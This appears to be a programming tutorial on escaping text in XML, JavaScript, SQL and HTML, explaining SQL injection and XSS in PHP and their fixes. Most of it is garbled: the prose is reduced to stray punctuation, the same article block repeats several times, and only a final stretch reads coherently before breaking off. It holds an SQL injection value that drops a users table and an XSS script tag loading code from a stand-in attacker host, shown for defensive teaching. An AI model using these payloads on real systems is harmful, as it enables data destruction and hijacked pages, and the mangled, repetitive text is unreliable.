<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

...and the parser falls over. It takes the second quote for the end of the string and has no idea what to do with the rest of the line. Again we need a way to say "this quote is part of the text, not the end of the string". JavaScript, like many languages, uses the backslash for that:

var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

So far all of this is manageable. The trouble starts when the texts are nested several levels deep: a program, which is text, builds another text out of pieces, some of which come from somewhere else, and that text is then read by yet another program with its own rules. A quote is special inside a string, a bracket is special in HTML, and a character that is harmless at one level can be "special" at the next. Every piece has to be escaped by the rules of the text it is put into, and at each level you have to know which rules apply.



The classic example is SQL. An SQL query is just text, for instance:

SELECT phone_number FROM users WHERE name = 'Alex'

The database reads this text, understands it, and does what it says. But where does the text come from? From a program, which builds it as a string. In PHP:

$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);

So far nothing special: the query is a fixed string, we know exactly what it says, and the database does exactly what we expect.



But queries are rarely fixed. Usually the program looks up whatever the user asked for. Something like this:

$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

Look at what is going on here: a text (the PHP program) contains another text (the SQL query), which contains yet another text (the user's input)! Three texts, one inside the other, each with its own rules!



And here is the problem. $_POST['name'] is whatever somebody typed into a form, and it is pasted straight into the SQL text. The database cannot tell which part of the query is ours and which part is the user's name. For SQL there is only one text, and all of it is "query".



So what can the user type? Anything at all. For example:



$name: Alex
Query: SELECT phone_number FROM users WHERE name = 'Alex'

$name: Mc'Donalds
Query: SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

$name: Joe'; DROP TABLE users; --
Query: SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

See what happened? In example 2 the user's text contains a quote, and the query now has one quote too many: the database reports a syntax error. Annoying, but harmless. Example 4 is another matter. Do you see it? Look closely...

...the query now consists of two statements. The first one says: find the phone number of Joe. The second one says: drop the table users. And the rest of the line, including the quote we appended, is hidden behind the comment marker (--), so the database never even complains about it.



This is SQL injection. The user's text was never meant to be SQL, but because it was pasted into the SQL text unmarked, the database reads it as SQL. Quotes, semicolons, comment markers and so on all have a meaning in SQL, and we passed every one of them through as "special" instead of as text.



!

The same thing happens with XSS. This time the text in question is HTML.

Say you run a forum, a guest book, whatever: users post text, and you show the posts to other users. The page is HTML, and it is built by a program, so the natural thing is a template like this:

<div class="post">
    <p class="meta">
        Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo $post['body']; ?>
    </p>
</div>

With an ordinary post the result is what you would expect:

<div class="post">
    <p class="meta">
        Posted by Plato on January 2, 15:31
    </p>
    <p class="body">
